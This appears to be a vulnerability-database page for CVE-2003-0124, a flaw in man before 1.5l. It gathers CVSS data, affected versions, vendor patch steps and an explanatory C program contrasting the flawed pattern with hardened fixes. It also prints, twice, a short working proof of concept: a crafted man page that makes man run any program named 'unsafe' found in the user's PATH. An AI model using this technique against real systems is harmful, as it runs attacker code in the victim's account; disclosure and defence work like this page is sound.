CVE-2003-0124
CVSS 4.6
Published: 2003-03-18 00:00:00
Last revised: 2016-10-17 22:29:49

[Original] man before 1.5l allows attackers to execute arbitrary code via a malformed man file with improper quotes, which causes the my_xsprintf function to return a string with the value "unsafe," which is then executed as a program via a system call if it is in the search path of the user who runs man.


[CNNVD] Man Program Unsafe Return Value Command Execution Vulnerability (CNNVD-200303-055)

Versions of man before 1.5l are vulnerable. An attacker who can get a user to open a malformed man page with improper quoting can execute arbitrary code: the bad quoting causes the my_xsprintf function to return a string containing the literal value "unsafe", and the caller then executes that string as a program through a system call, so any executable named "unsafe" in the search path of the user running man is run. The attack is local (it needs a victim to view the attacker's man page), not remote.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [considerable information disclosure is possible]
Integrity impact: PARTIAL [modification of some system files or data is possible]
Availability impact: PARTIAL [reduced performance or interruption of access to resources is possible]
Access complexity: LOW [no specialised access conditions are required]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is required to exploit]

- CPE (受影响的平台与产品)

cpe:/a:andries_brouwer:man:1.5i
cpe:/a:andries_brouwer:man:1.5k
cpe:/a:andries_brouwer:man:1.5h1
cpe:/a:andries_brouwer:man:1.5i2
cpe:/a:andries_brouwer:man:1.5j

- OVAL (technical details for detection)

No matching OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0124
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0124
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-055
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000620
(UNKNOWN)  CONECTIVA  CLSA-2003:620
http://marc.info/?l=bugtraq&m=104740927915154&w=2
(UNKNOWN)  BUGTRAQ  20030311 Vulnerability in man < 1.5l
http://marc.info/?l=bugtraq&m=104802285112752&w=2
(UNKNOWN)  GENTOO  GLSA-200303-13
http://www.redhat.com/support/errata/RHSA-2003-133.html
(UNKNOWN)  REDHAT  RHSA-2003:133
http://www.redhat.com/support/errata/RHSA-2003-134.html
(UNKNOWN)  REDHAT  RHSA-2003:134
http://www.securityfocus.com/bid/7066
(VENDOR_ADVISORY)  BID  7066
http://xforce.iss.net/xforce/xfdb/11512
(UNKNOWN)  XF  man-myxsprintf-code-execution(11512)

- Vulnerability information

Man Program Unsafe Return Value Command Execution Vulnerability
Severity: Medium  Class: Design error
Published: 2003-03-18 00:00:00  Updated: 2006-11-02 00:00:00
Access: Local
Versions of man before 1.5l are vulnerable. An attacker who can get a user to open a malformed man page with improper quoting can execute arbitrary code: the bad quoting causes the my_xsprintf function to return a string containing the literal value "unsafe", and the caller then executes that string as a program through a system call, so any executable named "unsafe" in the search path of the user running man is run.

- Advisories and patches

Sorcerer Linux has released an advisory. Users are advised to update man sources by issuing the following commands:
augur synch && augur update
It is recommended that all Gentoo Linux users who are running sys-apps/man upgrade to man-1.5l as follows:
emerge sync
emerge man
emerge clean
Mandrake has released a security advisory (MDKSA-2003:054) containing fixes to address this issue. Users are advised to apply fixes as soon as possible.
Sun has released an update for Sun Linux 5.0.5.
Fixes available for:
Andries Brouwer man 1.5 k
Andries Brouwer man 1.5 i
Andries Brouwer man 1.5 i2
Andries Brouwer man 1.5 j
Andries Brouwer man 1.5 h1

- Vulnerability information (22344)

Man Program 1.5 Unsafe Return Value Command Execution Vulnerability (EDBID:22344)
Platform: linux  Type: local
Date: 2003-03-11  Verified
Author: Jack Lloyd
source: http://www.securityfocus.com/bid/7066/info

It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$

- Vulnerability information

8806
man Malformed man Page Command Execution

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-03-11  Unknown
Unknown  Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Man Program Unsafe Return Value Command Execution Vulnerability
Class: Design Error  BID: 7066
Remote: No  Local: Yes
Published: 2003-03-11 12:00:00  Updated: 2009-07-11 09:06:00
Discovery credited to Jack Lloyd <lloyd@acm.jhu.edu>.

- Affected software versions

Andries Brouwer man 1.5 k
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux 8.0 i686
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
Andries Brouwer man 1.5 j
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 athlon
+ RedHat Linux 7.2
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
+ Sun Linux 5.0.5
Andries Brouwer man 1.5 i2
Andries Brouwer man 1.5 i
Andries Brouwer man 1.5 h1
+ Red Hat Linux 6.2
+ RedHat Linux 7.0
+ RedHat Linux 5.2

- Unaffected software versions

Andries Brouwer man 1.5 l

- Discussion

It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

- Exploit

The following proof of concept has been made available by Jack Lloyd <lloyd@acm.jhu.edu>:

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`
#!/bin/sh

echo "oops"
id -a
$ man ./innocent.1
oops
uid=528(lloyd) gid=100(users) groups=100(users)
$
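The root cause described in the CVE text and exercised by Jack Lloyd's proof of concept above (in both the EDB and BID entries) is a sanitising formatter that signals rejection in band: instead of failing, it returns the string "unsafe", and the caller hands that string to the shell, where it resolves through $PATH. The following C program is an added illustration of that pattern next to two hardened forms; it is neither man's source nor Lloyd's code. model_xsprintf, the metacharacter set SHELL_META, and the "/usr/bin/nroff -man" command template are assumptions made for the demo, and the demo returns the command line rather than calling system() so it can be run safely.

```c
#include <stdio.h>
#include <string.h>

/* Characters treated as shell metacharacters by the model sanitiser.
 * Assumed set for this demo; not the list used by man 1.5. */
static const char SHELL_META[] = "'\"`$\\;&|<>()*?[]{}~ \t\n";

/* Model of the flaw: a "safe" formatter that, when an argument contains
 * shell metacharacters, does not fail but returns the literal string
 * "unsafe".  Imitates the behaviour the CVE text describes; it is not
 * man's my_xsprintf. */
const char *model_xsprintf(char *out, size_t outlen, const char *cmd,
                           const char *arg)
{
    if (strpbrk(arg, SHELL_META) != NULL) {
        snprintf(out, outlen, "%s", "unsafe");   /* in-band error value */
        return out;
    }
    snprintf(out, outlen, "%s %s", cmd, arg);
    return out;
}

/* Vulnerable caller: whatever the formatter returns is meant for system().
 * Returns that command line instead of executing it. */
const char *vulnerable_command(char *out, size_t outlen, const char *page)
{
    const char *cmd = model_xsprintf(out, outlen, "/usr/bin/nroff -man", page);
    /* Real bug: system(cmd).  With page = "\"\".1" cmd is just "unsafe",
     * so the shell looks for an executable named unsafe in $PATH. */
    return cmd;
}

/* Hardened caller 1: rejection is reported out of band (return code) and
 * never as a string, so a rejected argument cannot become a command.
 * Returns 0 and fills out on success; -1 and an empty out otherwise. */
int hardened_command(char *out, size_t outlen, const char *cmd,
                     const char *page)
{
    if (outlen == 0) return -1;
    if (page[0] == '\0' || strpbrk(page, SHELL_META) != NULL) {
        out[0] = '\0';
        return -1;
    }
    int n = snprintf(out, outlen, "%s %s", cmd, page);
    if (n < 0 || (size_t)n >= outlen) {   /* truncation is also a failure */
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Hardened caller 2: avoid the shell entirely.  Build an argv for execvp();
 * the page name is one argument, so quotes or $ in it are plain bytes and
 * no metacharacter filter is needed.  Only option injection (a name that
 * starts with '-') has to be refused.  Returns argc, or -1 on rejection. */
int build_argv(const char *page, const char *argv[], size_t maxargs)
{
    if (maxargs < 4 || page[0] == '\0' || page[0] == '-') return -1;
    argv[0] = "nroff";
    argv[1] = "-man";
    argv[2] = page;
    argv[3] = NULL;
    return 3;
}

int main(void)
{
    char buf[256];
    const char *argv[4];
    const char *malicious = "\"\".1";   /* the .so target from the PoC */

    printf("vulnerable : system(\"%s\")\n",
           vulnerable_command(buf, sizeof buf, malicious));

    int rc = hardened_command(buf, sizeof buf, "/usr/bin/nroff -man", malicious);
    printf("hardened 1 : rc=%d cmd=\"%s\"\n", rc, buf);

    int argc = build_argv(malicious, argv, 4);
    printf("hardened 2 : argc=%d argv[2]=%s (passed verbatim to execvp)\n",
           argc, argc > 0 ? argv[2] : "");
    return 0;
}
```

The two fixes make different trade-offs: hardened_command keeps the shell and therefore still needs a complete metacharacter list, which is exactly the kind of list that tends to be incomplete; build_argv removes the shell from the path, so the filename never gets interpreted and the only remaining concern is an argument that looks like an option.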

- Solution

Sorcerer Linux has released an advisory. Users are advised to update man sources by issuing the following commands:

augur synch && augur update

It is recommended that all Gentoo Linux users who are running
sys-apps/man upgrade to man-1.5l as follows:

emerge sync
emerge man
emerge clean

Mandrake has released a security advisory (MDKSA-2003:054) containing fixes to address this issue. Users are advised to apply fixes as soon as possible.

Sun has released an update for Sun Linux 5.0.5.

Fixes available for:

Andries Brouwer man 1.5 k
Andries Brouwer man 1.5 i
Andries Brouwer man 1.5 i2
Andries Brouwer man 1.5 j
Andries Brouwer man 1.5 h1

- References
